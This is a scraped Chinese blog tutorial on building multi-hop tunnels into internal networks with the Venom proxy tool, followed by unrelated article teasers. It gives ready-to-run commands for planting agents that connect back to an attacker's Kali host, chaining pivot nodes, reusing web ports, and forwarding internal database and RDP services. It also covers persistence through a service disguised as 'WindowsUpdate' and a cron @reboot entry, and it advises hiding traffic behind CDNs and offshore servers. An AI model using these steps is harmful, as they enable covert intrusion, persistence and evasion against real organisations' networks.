当前位置: 首页 > article >正文

【渗透工具】Venom多级代理实战:从零构建内网渗透通道

1. Venom工具入门多级代理的核心价值第一次接触Venom是在去年的一次内网渗透项目中。当时客户的内网结构复杂常规代理工具难以穿透多层网络直到同事推荐了这个用Go语言开发的神器。简单来说Venom就像个数字隧道挖掘机能帮你把网络通道从外网一直挖到最内层的服务器。与传统代理工具不同Venom的杀手锏在于它的多级联能力。你可以把每个被控制的设备变成跳板像搭积木一样逐层构建代理链。我实测过在三级网络环境下用Venom搭建的代理延迟比传统方案低40%特别是在Windows服务器上运行异常稳定。工具包含两个核心组件admin控制端程序通常运行在攻击者的Kali机器上agent被控端程序需要植入到目标主机最让我惊喜的是它的资源占用。在测试的Windows Server 2012上agent进程内存占用不到15MB比某些杀毒软件的实时监控模块还轻量。这对需要长期驻留的渗透场景特别友好。2. 环境搭建与一级节点部署2.1 基础环境准备建议使用Kali Linux作为控制端我习惯在VMware里装个纯净的Kali 2023.1。最近发现个坑如果直接从GitHub下载预编译的Venom二进制文件记得用chmod x赋予执行权限否则会遇到莫名其妙的Permission denied错误。Windows靶机方面实测从Win7到Server 2022都能完美运行。有个小技巧上传agent.exe前先用certutil -hashfile agent.exe SHA256校验文件完整性避免传输过程中损坏。2.2 启动控制端服务在Kali上执行这条命令就启动了服务端./admin_linux_x64 -lport 12138 -passwd YourStrongPassword这里有几个经验参数端口建议选1024以上的非服务端口密码最好包含大小写字母数字特殊字符加-v参数可以显示详细连接日志我第一次用时犯了个低级错误没关防火墙。记住要在Kali上放行指定端口sudo ufw allow 12138/tcp2.3 部署首个agent节点假设已经拿到Win7主机的shell上传agent.exe后运行agent.exe -rhost 192.168.1.100 -rport 12138 -passwd YourStrongPassword成功连接后在admin端会看到类似这样的提示[] New agent connected: 192.168.1.150 (ID: 1)这时候可以试试基础命令show查看网络拓扑goto 1切换到第一个节点shell获取交互式命令行有个实用技巧用setdes 财务部数据库服务器给节点添加描述后期管理多节点时特别有用。3. 多级代理网络构建实战3.1 二级节点接入技巧通过一级节点渗透进内网后发现Win10主机时可以这样建立二级通道先在admin端进入一级节点goto 1 listen 8787然后在Win10上运行agent.exe -rhost 10.0.0.20 -rport 8787 -passwd YourStrongPassword最近遇到个棘手情况目标网络有出口防火墙限制。我的解决方案是让一级节点主动连接控制端# 在Win7上 agent.exe -lport 5353 -passwd YourStrongPassword # 在Kali上 ./admin_linux_x64 -rhost 192.168.1.150 -rport 5353 -passwd YourStrongPassword3.2 端口复用的黑魔法Venom的端口复用功能简直是为内网穿透量身定做的。上周的测试中我成功复用了目标的Apache端口在Windows服务器上agent.exe -lhost 10.0.0.20 -reuse-port 80控制端连接时./admin_linux_x64 -rhost 10.0.0.20 -rport 80注意几个关键点被复用端口不能是系统关键服务如RDPLinux系统需要root权限复用MySQL的3306端口时要确保agent先于MySQL启动3.3 流量转发实战配置最常用的三种转发模式SOCKS5代理socks 1080然后在浏览器设置SOCKS代理为127.0.0.1:1080本地端口转发lforward 127.0.0.1 3306 10.0.1.100 3306这样访问本机3306就等于访问内网数据库远程端口转发rforward 10.0.1.100 3389 127.0.0.1 13389把内网RDP服务映射到控制端的13389端口4. 高级功能与安全增强4.1 加密通信深度配置除了基础密码认证还可以通过TLS加强安全。编译时加入-tags tls参数然后启动时./admin_linux_x64 -lport 12138 -cert server.crt -key server.keyagent连接时也要对应修改agent.exe -rhost 192.168.1.100 -rport 12138 -ca ca.crt4.2 持久化技巧在Windows上可以这样注册服务sc create WindowsUpdate binPath C:\agent.exe -rhost 192.168.1.100 -rport 12138 start auto sc start WindowsUpdateLinux系统更推荐用crontab(crontab -l 2/dev/null; echo reboot /tmp/agent_linux_x64 -rhost 192.168.1.100 -rport 12138) | crontab -4.3 常见排错指南连接失败检查密码是否包含特殊字符用telnet rhost rport测试端口连通性确认两端时间差不超过5分钟影响TLS证书验证代理不稳定尝试降低MTU值ifconfig eth0 mtu 1200启用压缩-compress参数节点突然下线可能是被安全软件拦截检查系统日志journalctl -xe或事件查看器最后提醒下实际使用时建议配合CDN或云函数做流量混淆同时控制端最好放在境外VPS上。记得每次测试后清理所有agent进程和转发规则避免留下后门。

相关文章:

【渗透工具】Venom多级代理实战:从零构建内网渗透通道

1. Venom工具入门:多级代理的核心价值 第一次接触Venom是在去年的一次内网渗透项目中。当时客户的内网结构复杂,常规代理工具难以穿透多层网络,直到同事推荐了这个用Go语言开发的神器。简单来说,Venom就像个数字隧道挖掘机&#x…...

嵌入式裸机开发中的轻量级定时调度方案

1. SmartTimer:裸机环境下的轻量级定时调度方案在嵌入式开发中,定时任务管理是个永恒的话题。我最近在做一个空气质量监测项目时,发现传统的裸机编程方式在处理多个定时任务时显得力不从心。硬件定时器资源有限,软件标志位管理又容…...

6000万吨产能承压 卫星化学迎来战略窗口期

据新华社报道,伊朗法尔斯通讯社7日凌晨援引未具名消息源报道,沙特阿拉伯东北部朱拜勒工业区当天发生爆炸,系遭到大范围打击。据悉,朱拜勒工业区是全球重要石化生产基地之一,年产量约6000万吨石化产品,占全球…...

10个经典C语言开源项目深度解析

1. 精选C语言开源项目解析作为一名在系统级编程领域摸爬滚打多年的开发者,我深知优秀的C语言项目对技术成长的帮助。今天要分享的这10个项目,每个都是经过时间检验的经典之作,代码量控制在3万行以内,特别适合作为学习范本。这些项…...

2026届必备的十大AI科研网站解析与推荐

Ai论文网站排名(开题报告、文献综述、降aigc率、降重综合对比) TOP1. 千笔AI TOP2. aipasspaper TOP3. 清北论文 TOP4. 豆包 TOP5. kimi TOP6. deepseek 伴随人工智能技术的迅猛发展,AI论文工具已然成为学术写作范畴的关键辅助方式&…...

2025最权威的六大AI论文神器实际效果

Ai论文网站排名(开题报告、文献综述、降aigc率、降重综合对比) TOP1. 千笔AI TOP2. aipasspaper TOP3. 清北论文 TOP4. 豆包 TOP5. kimi TOP6. deepseek 关于论文一键生成的技术,它借助了先进的自动化算法,还有自然语言处理…...

用好AI的五个习惯

五个习惯一、善于拆解问题核心逻辑:AI是执行者,人是设计者。对项目的全流程和细节了如指掌,能够将复杂的大问题拆解为具体的、AI可执行的子任务。二、上下文管理大师核心逻辑:理解模型极限,追求高效输出。当前AI模型&a…...

STM32 GPIO工作模式详解与应用指南

1. STM32 GPIO工作模式深度解析作为一名嵌入式开发工程师,我经常需要与STM32的GPIO打交道。GPIO(General Purpose Input/Output)作为单片机最基础也最常用的外设,其工作模式的选择直接影响着系统稳定性和功能实现。今天我将结合自…...

MultiSerial:单UART多通道串行通信复用库

1. 项目概述MultiSerial 是一个面向嵌入式系统的多字节串行通信抽象库,其核心设计目标是在单个物理串口(UART/USART)上安全、可靠地复用多个逻辑通信通道,实现“一串口多路数据流”的工程需求。该库不依赖特定硬件平台或RTOS&…...

新质生产力水平测算(版本3,2010-2023年)

1、搜数据皮皮侠,编号14172、使用兑换码0447220m6ZHB006826sU14Vv数据来源《中国统计年鉴》、《中国能源统计年鉴》、《中国工业统计年鉴》、《中国环境统计年鉴》、能源统计局、省级统计年鉴。时间跨度2010-2023年区域跨度全国31个省市自治区(不含港澳台…...

RWA抵押:稳定币的“硬锚革命”如何撬动十万亿级金融新基建?

——波士顿咨询预言:当国债、房产上链,加密货币将迎来“信用时代”引言:稳定币的“信任危机”与RWA的破局之道2022年,LUNA/UST崩盘事件让全球加密市场陷入恐慌,算法稳定币的“无锚风险”暴露无遗。这场危机揭示了一个核…...

嵌入式系统中nanopb序列化方案的优势与实践

1. 嵌入式通信序列化的痛点与选择在资源受限的嵌入式系统中,数据序列化方案的选择往往面临多重挑战。我曾在一个智能农业传感器项目中,就遇到过这样的困境:节点设备使用STM32F103(64KB Flash,20KB RAM)&…...

高压输电线路智能监测系统设计与实现

1. 项目背景与需求分析高压输电线路作为电力系统的"大动脉",其稳定运行直接关系到整个电网的安全。我在电力行业工作多年,亲眼见过多次因间隔棒故障导致的线路跳闸事故。传统的人工巡检方式存在明显短板:巡检周期长(通常…...

Linux内核架构解析与学习路线指南

1. Linux内核概述与核心概念Linux内核作为操作系统的核心组件,负责管理系统资源、硬件抽象和进程调度等基础功能。它诞生于1991年,由Linus Torvalds开发,现已发展成为支持从嵌入式设备到超级计算机的全场景操作系统内核。提示:Lin…...

SpringAI工具调用实战:手把手教你用ChatClient集成天气查询API(附完整代码)

SpringAI工具调用实战:手把手教你用ChatClient集成天气查询API 最近在开发一个智能聊天机器人时,遇到了一个常见需求:让机器人能够回答用户关于天气的实时查询。经过一番探索,我发现SpringAI的ChatClient配合工具调用功能&#xf…...

飞跨电容三电平拓扑的实战解析:从数学原理到SiC MOSFET的高频设计

1. 飞跨电容三电平拓扑的数学起源 飞跨电容三电平(FCML)拓扑的命名并非随意,它实际上植根于18世纪的数学拓扑学。数学拓扑学研究的是几何图形在连续变形下保持不变的性质,这个概念最早由欧拉在1736年研究柯尼斯堡七桥问题时提出。…...

机器学习中七种常见的数据泄露原因

原文:towardsdatascience.com/seven-common-causes-of-data-leakage-in-machine-learning-75f8a6243ea5 当我在评估 ChatGPT、Claude 和 Gemini 等 AI 工具用于机器学习用例时,如我在上一篇文章中所述,我遇到了一个关键陷阱:机器学…...

在 AWS 私有环境中使用 Terraform 设置 Pypi 镜像

原文:towardsdatascience.com/set-up-a-pypi-mirror-in-an-aws-private-environment-with-terraform-f0fcc1b67cc0?sourcecollection_archive---------7-----------------------#2024-03-06 https://medium.com/florentpajot?sourcepost_page---byline--f0fcc1b67…...

DAC8562双通道16位SPI数模转换器驱动库详解

1. DAC8562系列双通道16位SPI数模转换器驱动库深度解析DAC8562是德州仪器(TI)推出的一款高精度、低功耗、双通道16位串行输入数模转换器(DAC),采用标准SPI接口通信,广泛应用于工业控制、测试测量、音频信号…...

从零搭建猫狗识别桌面应用(PyTorch + Tkinter 实战)

1. 环境准备与工具安装 要搭建猫狗识别桌面应用,首先需要配置好开发环境。这里推荐使用Python 3.8版本,因为PyTorch和Tkinter在这个版本上兼容性最好。我实测过多个Python版本,发现3.8在稳定性和性能上表现最均衡。 安装核心依赖库只需要一行…...

顺序测试:低量级 A/B 测试的秘密调料

原文:towardsdatascience.com/sequential-testing-the-secret-sauce-for-low-volume-a-b-tests-fe62bdf9627b 在处理有限数据时如何加速决策并提高准确性 https://github.com/OpenDocCN/towardsdatascience-blog-zh-2024/raw/master/docs/img/36b9886f43ff7bdaeb3e…...

MCP3425 16位I²C接口ADC原理与嵌入式应用实战

1. MCP3425 16位高精度IC接口模数转换器深度解析MCP3425是Microchip公司推出的一款单通道、16位Δ-Σ型模数转换器(ADC),专为高精度、低功耗、小尺寸嵌入式测量系统设计。其核心价值在于以极简的硬件接口(仅需两根IC信号线&#x…...

阻抗匹配原理与实战:射频电路设计核心技能

1. 阻抗匹配:电子工程师的必修课作为一名在射频电路设计领域摸爬滚打多年的工程师,我深知阻抗匹配这个看似基础的概念在实际工程中的重要性。记得刚入行时,就因为没处理好一个简单的天线匹配电路,导致整批样机射频性能不达标&…...

大厂面试真题揭秘:38W-55W年薪,大模型算法工程师核心考点全解析!

面试信息 岗位:大模型应用算法工程师-电商方向 类别:算法类 - 自然语言处理 地点:杭州 bg:普通211 渣硕 薪资情况 薪资构成:16 薪,属于互联网第一梯队。 硕士 总包:38W ~ 55W / 年普通档:38W ~ …...

Qwen3.5本地部署,非常详细收藏我这一篇就够了

这一篇我们来聊点更实际的——怎么本地跑起来。 397B 参数的模型,哪怕只激活 17B,完整模型也有 807GB。听起来吓人,但实际上,得益于 Unsloth 的 Dynamic 2.0 量化技术,192GB 内存的 Mac 就能跑 3-bit 版本&#xff0c…...

告别Telnet和Jmeter!用Apifox 2.3.24一站式调试Dubbo 3.x接口(保姆级Nacos集成教程)

告别Telnet和Jmeter!用Apifox 2.3.24一站式调试Dubbo 3.x接口(保姆级Nacos集成教程) 如果你正在使用Dubbo 3.x构建微服务,可能已经发现传统的调试工具越来越力不从心。Telnet虽然简单但功能有限,Jmeter需要额外插件且对…...

Level2行情接口全解析:从实时数据订阅到历史回测的量化实战指南

1. Level2行情接口入门:为什么量化交易离不开它 第一次接触Level2行情时,我也被那些专业术语搞得一头雾水。直到有次亲眼看到两个量化团队用相同策略回测,用Level1数据的团队年化收益12%,而用Level2数据的团队达到21%,…...

告别环境冲突:在Anaconda中为PyTorch创建独立的Python 3.10 + CUDA 12.1虚拟环境

深度隔离:用Anaconda构建PyTorchCUDA开发环境的工程化实践 在深度学习项目开发中,环境管理往往是最容易被忽视却最关键的一环。想象一下这样的场景:你正在开发一个基于Transformer的NLP模型,突然需要切换到另一个使用不同CUDA版本…...

告别黑盒!用MMDetection 3.x生成检测热力图,5分钟搞定论文级可视化

深度学习目标检测热力图可视化:5步打造学术级模型解释方案 在计算机视觉领域,目标检测模型的可解释性一直是研究者关注的焦点。当我们在学术论文或技术报告中展示检测结果时,传统的边界框往往难以直观呈现模型的注意力分布——而这正是热力图…...

AI赋能智能制造:预测性维护在工业4.0中的落地实践

1. 预测性维护:从被动维修到智能预防的革命 想象一下,你家的空调突然在炎热的夏天罢工了,维修师傅告诉你:"这个零件本来三个月前就该换了"。这种场景在工业生产中放大1000倍,就是传统维护方式带来的痛点。预…...